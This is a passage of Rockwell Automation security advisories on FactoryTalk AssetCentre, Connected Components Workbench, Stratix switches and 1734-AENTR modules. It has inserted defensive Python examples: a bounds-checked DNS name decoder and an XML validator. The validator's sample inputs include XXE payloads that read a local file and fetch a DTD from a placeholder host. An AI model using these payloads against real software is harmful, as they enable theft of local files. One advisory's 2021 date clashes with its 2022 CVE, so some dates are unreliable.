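The decompression function named above is the routine that follows RFC 1035 name-compression pointers while rebuilding a domain name. The added example below is not Wind River or Rockwell Automation code; it is a Python decoder that applies the bounds checks such a routine needs (message bounds, backwards-only pointers, the 63-octet label and 255-octet name limits, a hop budget) so that a crafted message cannot drive it past its buffers. The sample DNS response is constructed.

```python
"""Bounds-checked DNS name decompression (RFC 1035 section 4.1.4).
Added example, not Wind River or Rockwell Automation code; the message
below is constructed for illustration."""

MAX_LABEL = 63       # RFC 1035: a label holds at most 63 octets
MAX_NAME = 255       # RFC 1035: a whole name is at most 255 octets on the wire
MAX_POINTERS = 16    # hop budget; legitimate names need only one or two


class MalformedName(ValueError):
    """The name at this offset cannot be decoded safely."""


def read_name(msg: bytes, offset: int):
    """Decode the name at msg[offset:] and return (name, next_offset).

    next_offset is the first octet after the name *as it appears at
    offset*; following a pointer does not move it. Guards:
      * every length octet and label body is checked against len(msg);
      * a pointer must target an earlier offset than the one it sits at,
        so a chain of bare pointers strictly descends and must end;
      * the decompressed length is accumulated and capped at MAX_NAME, so
        a cycle that passes through labels is cut off as well;
      * MAX_POINTERS is a second, independent stop for pointer chains.
    """
    labels = []
    wire_len = 0
    hops = 0
    cursor = offset
    resume = None
    while True:
        if cursor >= len(msg):
            raise MalformedName("name runs past the end of the message")
        length = msg[cursor]
        if (length & 0xC0) == 0xC0:                    # compression pointer
            if cursor + 1 >= len(msg):
                raise MalformedName("truncated compression pointer")
            target = ((length & 0x3F) << 8) | msg[cursor + 1]
            if target >= cursor:
                raise MalformedName("pointer does not point backwards")
            hops += 1
            if hops > MAX_POINTERS:
                raise MalformedName("too many compression pointers")
            if resume is None:
                resume = cursor + 2
            cursor = target
            continue
        if length & 0xC0:                              # 0x40 / 0x80: reserved
            raise MalformedName("unsupported label type")
        if length > MAX_LABEL:
            raise MalformedName("label longer than 63 octets")
        wire_len += length + 1
        if wire_len > MAX_NAME:
            raise MalformedName("decompressed name longer than 255 octets")
        if length == 0:                                # root label ends the name
            return ".".join(labels) or ".", (resume if resume is not None else cursor + 1)
        if cursor + 1 + length > len(msg):
            raise MalformedName("label body runs past the end of the message")
        labels.append(msg[cursor + 1:cursor + 1 + length].decode("ascii", "replace"))
        cursor += 1 + length


def try_read_name(msg: bytes, offset: int):
    """read_name() that returns None instead of raising."""
    try:
        return read_name(msg, offset)
    except MalformedName:
        return None


# Constructed response: header, question "example.com A IN", and one answer
# whose owner name is the pointer 0xC00C back to offset 12 (the QNAME).
SAMPLE_RESPONSE = (
    b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"          # header
    b"\x07example\x03com\x00"                                     # QNAME at 12
    b"\x00\x01\x00\x01"                                           # QTYPE A, QCLASS IN
    b"\xc0\x0c"                                                   # answer NAME -> 12
    b"\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\xc0\x00\x02\x01"  # A 192.0.2.1, TTL 3600
)


def answer_owner_name(msg: bytes) -> str:
    """Walk the single question and return the first answer's owner name."""
    _, after_qname = read_name(msg, 12)
    name, _ = read_name(msg, after_qname + 4)       # skip QTYPE and QCLASS
    return name
```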

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Family | Catalogs | Suggested Actions
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | Will not be patched. Suggested action is to migrate to the 5069-AENTR.
CompactLogix 5370 | 1769-L1y, 1769-L2y, 1769-L3y | Apply v30 or later.
CompactLogix 5370 | 1769-L3yS | Apply v28.015 or v30 or later.
ControlLogix® 5580 | 1756-L8 | Apply v30 or later.
CompactLogix 5380 | 5069-L3 | Apply v30 or later.
ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TK/D, 1756-EN2TXT/D, 1756-EN2F/C, 1756-EN2FK/C, 1756-EN2TR/C, 1756-EN2TRK/C, 1756-EN2TRXT/C, 1756-EN3TR/B, 1756-EN3TRK/B, 1756-EN2TPK/A, 1756-EN2TPXT/A | Apply v11.001 or later.
ControlLogix EtherNet/IP Module | 1756-EN2TP/A | Apply v10.020 or later.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific protective features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2016-20009

Critical
PN1559 | PN1559 | FactoryTalk AssetCentre Vulnerable to Arbitrary Code Execution
Published Date:
April 01, 2021
Last Updated:
April 01, 2021
CVE IDs:
CVE-2021-27466, CVE-2021-27460, CVE-2021-27474, CVE-2021-27468, CVE-2021-27470, CVE-2021-27462, CVE-2021-27464, CVE-2021-27476, CVE-2021-27472
Products:
FactoryTalk AssetCentre
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 – April 1, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding nine vulnerabilities in FactoryTalk® AssetCentre software. These vulnerabilities, if successfully exploited, may allow unauthenticated attackers to perform arbitrary command execution, SQL injection, or remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre, v10.00 and earlier.

Vulnerability Details

CVE-2021-27462: Deserialization of untrusted data in AosService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the AosService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27466: Deserialization of untrusted data in ArchiveService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the ArchiveService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27470: Deserialization of untrusted data in LogService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the LogService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27474: Improperly restricted functions may result in loss of data integrity
FactoryTalk AssetCentre does not properly restrict all functions relating to IIS remoting services. This vulnerability may allow a remote, unauthenticated attacker to modify sensitive data in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27476: RACompareService service vulnerable to OS command injection
A vulnerability exists in the SaveConfigFile function of the RACompareService service that may allow for OS Command Injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27472: SearchService service vulnerable to SQL injection
A vulnerability exists in the RunSearch function of the SearchService service, which may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27468: AosService.rem vulnerable to SQL injection
The AosService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27464: ArchiveService.rem vulnerable to SQL injection
The ArchiveService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27460: Server deserialization of untrusted data in .NET remoting endpoints may lead to remote code execution
FactoryTalk AssetCentre components contain .NET remoting endpoints that deserialize untrusted data without sufficiently verifying that the resulting data will be valid. This vulnerability may allow a remote, unauthenticated attacker to gain full access to the FactoryTalk AssetCentre main server and all agent machines.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability | Suggested Actions
CVE-2021-27462, CVE-2021-27466, CVE-2021-27470, CVE-2021-27474, CVE-2021-27476, CVE-2021-27472, CVE-2021-27468, CVE-2021-27464, CVE-2021-27460 | Apply FactoryTalk AssetCentre v11 or above (Download).

As an additional mitigation, customers who are unable to upgrade or are concerned about unauthorized client connections are encouraged to deploy IPsec, a built-in security feature found within FactoryTalk AssetCentre. Users should follow the guidance found in QA46277. IPsec minimizes exposure to unauthorized clients and has been tested in FactoryTalk AssetCentre v9 – v11.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or another similar allow-list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-091-01

Medium
PN1588 | PN1588 | File Parsing XML Entity in Multiple Products
Published Date:
March 28, 2021
Last Updated:
March 28, 2021
CVE IDs:
CVE-2022-1018
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 – March 28, 2021

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative which identified vulnerabilities in Connected Components Workbench, ISaGRAF Workbench and Safety Instrumented Systems Workbench for AADvance and Trusted controllers. If successfully exploited, these vulnerabilities may result in information leakage and loss of confidentiality. This vulnerability requires user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Components Workbench Version 12.00 and below
  • ISaGRAF Workbench 6.6.9 and below
  • Safety Instrumented Systems Workstation 1.1 and below

Vulnerability Details

CVE-2022-1018: XML External Entity Leads to Information Leak

When opening a malicious solution file provided by an attacker, the application suffers from an XML External Entity (XXE) vulnerability due to an unsafe call within a dynamic link library file.

As a result, this could be exploited to pass the contents of local files on the victim's machine to a remote web server controlled by an attacker, leading to a loss of confidentiality.

CVSS v3.1 Base Score: 5.5/10 [Medium]
CVSS v3.1 Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
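The "unsafe call" above is a parser that honours external entity declarations in a user-supplied file. The added example below is not Rockwell Automation code: it uses Python's standard-library expat bindings to refuse any document that declares an external general or parameter entity before the content is processed, and it treats a constructed XML document as a stand-in for a solution file, since the real format is not described in the advisory. The file and host names in the samples are placeholders.

```python
"""Refuse XML that declares external entities before a DTD-aware parser
can act on it. Added example, not Rockwell Automation code; the "solution
files" below are constructed stand-ins with placeholder identifiers."""
import xml.parsers.expat


class ExternalEntityError(ValueError):
    """The document declares an entity that would be read from a file or URL."""


def parse_untrusted_xml(data: bytes) -> list:
    """Parse data and return the element names in document order.

    expat itself does not fetch external entities, but a library layered
    on top of it may, so the refusal is made explicit here rather than
    left to defaults:
      * EntityDeclHandler sees every <!ENTITY ...> in the DTD; a system
        or public identifier marks it as external, and the parse aborts.
        Parameter entities, the usual vehicle for out-of-band exfiltration
        to a remote server, are reported through the same handler.
      * ExternalEntityRefHandler is the last line: returning 0 makes expat
        fail the parse instead of dereferencing anything.
    Internal entities (literal values) are still allowed.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_param else "general"
            raise ExternalEntityError(f"external {kind} entity {name!r} -> {system_id!r}")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def is_safe_solution(data: bytes) -> bool:
    """True when the document parses without any external entity."""
    try:
        parse_untrusted_xml(data)
        return True
    except (ExternalEntityError, xml.parsers.expat.ExpatError):
        return False


# Constructed samples. A benign file, one with a harmless internal entity,
# one declaring a local-file entity, and one that pulls a remote DTD.
SAFE_SOLUTION = b"""<?xml version="1.0"?>
<Solution name="PumpStation">
  <Project type="Micro850" path="Pump.ccw"/>
</Solution>"""

INTERNAL_ENTITY_SOLUTION = b"""<?xml version="1.0"?>
<!DOCTYPE Solution [ <!ENTITY vendor "Rockwell Automation"> ]>
<Solution name="PumpStation" vendor="&vendor;"/>"""

LOCAL_FILE_SOLUTION = b"""<?xml version="1.0"?>
<!DOCTYPE Solution [
  <!ENTITY leak SYSTEM "file:///PLACEHOLDER/local-file.txt">
]>
<Solution name="PumpStation"><Comment>&leak;</Comment></Solution>"""

REMOTE_DTD_SOLUTION = b"""<?xml version="1.0"?>
<!DOCTYPE Solution [
  <!ENTITY % remote SYSTEM "http://placeholder-host.invalid/PLACEHOLDER.dtd">
  %remote;
]>
<Solution name="PumpStation"/>"""
```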

Risk Mitigation & User Action

Customers using the affected versions of this software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product | Suggested Actions
Connected Components Workbench Version 12.00 and below | Customers should update to Version 13.00, which mitigates this vulnerability.
ISaGRAF Workbench 6.6.9 and below | It is recommended that customers follow the guidelines below until a patch is available.
SIS Workstation 1.1 and below | Customers should update to version 1.2, which mitigates this vulnerability.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted files with Connected Components Workbench, ISaGRAF, or SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use Microsoft AppLocker or another similar allow-list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1018

High
PN1558 | PN1558 | Stratix Switches Impacted by IOS and IOS XE Software Vulnerabilities
Published Date:
March 26, 2021
Last Updated:
March 26, 2021
CVE IDs:
CVE-2021-1452, CVE-2021-1442, CVE-2021-1443, CVE-2021-1392, CVE-2021-1403, CVE-2021-1220, CVE-2021-1352
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 8300 L3 Modular Managed Switch, Stratix 5410 Ind Distribution Switch, Stratix 8000 Modular Managed Switch
CVSS Scores:
7.8, 7.4, 6.8, 4.3, 5.5, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - March 26, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Cisco regarding eight vulnerabilities in Stratix® switches. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, unauthorized privilege escalation, web socket hijacking, relative path traversal or command injection.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE ID | Affected Product Family | Affected Versions
CVE-2021-1392 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1392 | Stratix 8000, Stratix 5700, Stratix 5410, Stratix 5400 | 15.2(7)E3 and earlier
CVE-2021-1392 | Stratix 8300 | All versions
CVE-2021-1403 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1352 | Stratix 5800 | 17.04.01 and earlier, if DECnet is enabled.
CVE-2021-1442 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1452 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1443 | Stratix 5800 | 17.04.01 and earlier
CVE-2021-1220, CVE-2021-1356 | Stratix 5800 | 17.04.01 and earlier

Vulnerability Details

CVE-2021-1392: IOS and IOS XE Software Common Industrial Protocol (CIP) Privilege Escalation Vulnerability
A vulnerability in the CLI command permissions of Cisco® IOS and Cisco IOS XE software could allow an authenticated, local attacker to retrieve the password for Common Industrial Protocol (CIP™) and then remotely configure the affected device as an administrative user.

CVSS v3.1 Base Score: 7.8/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1403: IOS XE Software Web UI Cross-Site WebSocket Hijacking Vulnerability
A vulnerability in the web UI feature of Cisco IOS XE software could allow an unauthenticated, remote attacker to conduct a cross-site WebSocket hijacking (CSWSH) attack and cause a denial of service (DoS) condition on an affected device.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

CVE-2021-1352: IOS XE Software DECnet Phase IV/OSI Denial of Service Vulnerability
A vulnerability in the DECnet protocol processing of Cisco IOS XE software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. An attacker could exploit this vulnerability by sending DECnet traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.

This vulnerability affects Stratix 5800 devices if they are running a vulnerable release of Cisco IOS XE software and have the DECnet protocol enabled. DECnet is not enabled by default.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2021-1442: IOS XE Software Plug-and-Play Privilege Escalation Vulnerability
A vulnerability in a diagnostic command for the Plug and Play (PnP) subsystem of Cisco IOS XE software could allow an authenticated, local attacker to elevate privileges to the level of an Administrator on an affected Stratix 5800.

Plug and Play is disabled after Express Setup has completed.

CVSS v3.1 Base Score: 7.0/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1452: IOS XE ROM Monitor Software OS Command Injection Vulnerability
A vulnerability in the Stratix 5800 switches could allow an unauthenticated, physical attacker to execute persistent code at boot time and break the chain of trust.

CVSS v3.1 Base Score: 6.8/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1443: IOS XE Software Web UI OS Command Injection Vulnerability
A vulnerability in the web UI of the IOS XE software could allow a remote, authenticated attacker to execute arbitrary code with root privileges on the underlying operating system of the affected device. To exploit this vulnerability, an attacker would need to have Admin credentials to the device.

CVSS v3.1 Base Score: 5.5/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVE-2021-1220/CVE-2021-1356: IOS XE Software Web UI Denial-of-Service Vulnerabilities
Multiple vulnerabilities in the Web UI feature of IOS XE software could allow an authenticated, remote attacker with read-only privileges to cause the web management software to hang and consume vty line instances resulting in a denial-of-service (DoS) condition.

CVSS v3.1 Base Score: 4.3/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected Stratix devices are encouraged to update to an available firmware revision that addresses the associated risk.

Where a fix is not yet available, customers are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to apply general security guidelines to employ multiple strategies simultaneously.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.
CVE ID | Affected Product Family | Affected Firmware Versions | Suggested Actions
CVE-2021-1392 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1392 | Stratix 8000, Stratix 5700, Stratix 5410, Stratix 5400 | 15.2(7)E3 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.
CVE-2021-1392 | Stratix 8300 | All versions | Migrate to a contemporary solution.
CVE-2021-1403 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1352 | Stratix 5800 | 17.04.01 and earlier, if DECnet is enabled | If possible, disable the DECnet protocol completely or on select interfaces.

To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies.

CVE-2021-1442 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1452 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1443 | Stratix 5800 | 17.04.01 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.
CVE-2021-1220, CVE-2021-1356 | Stratix 5800 | 17.04.01 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.

General Security Guidelines


Network-based Vulnerability Mitigations for Embedded Products
  • Use proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
Software/PC-based Mitigation Strategies
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
General Mitigations
  • Use trusted firmware, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

High
PN1551 | PN1551 | 1734-AENTR Series B and Series C Contains Multiple Web Vulnerabilities
Published Date:
March 04, 2021
Last Updated:
March 04, 2021
CVE IDs:
CVE-2020-14504, CVE-2020-14502
Products:
1734 Point I/O
CVSS Scores:
7.5, 4.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 4, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Adam Eliot of the Loon Security Team regarding two vulnerabilities in the web interface of the 1734-AENTR Series B and Series C communications module. If successfully exploited, these vulnerabilities may lead to data modification on the device.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1734-AENTR Series B, versions 4.001 to 4.005, and 5.011 to 5.01.
1734-AENTR Series C, versions 6.011 and 6.012.

Vulnerability Details

CVE-2020-14504: Unauthenticated HTTP POST Requests
The web interface of the 1734-AENTR communication module mishandles authentication for HTTP POST requests. A remote, unauthenticated attacker can send a crafted request which may allow for modification of the configuration settings.

CVSSv3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-14502: Stored Cross Site Scripting (XSS)
The web interface of the 1734-AENTR Communications module is vulnerable to stored XSS. A remote, unauthenticated attacker could store a malicious script within the web interface that, when executed, could modify some string values on the “Home” page of the web interface.

CVSS v3.1 Base Score: 4.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Risk Mitigation & User Action

Customers using the affected 1734-AENTR Series B and Series C are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details | Recommended User Actions
CVE-2020-14504, CVE-2020-14502 | 1734-AENTR Series B: update to firmware version 5.018 (Download). 1734-AENTR Series C: update to firmware version 6.013 (Download).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

High
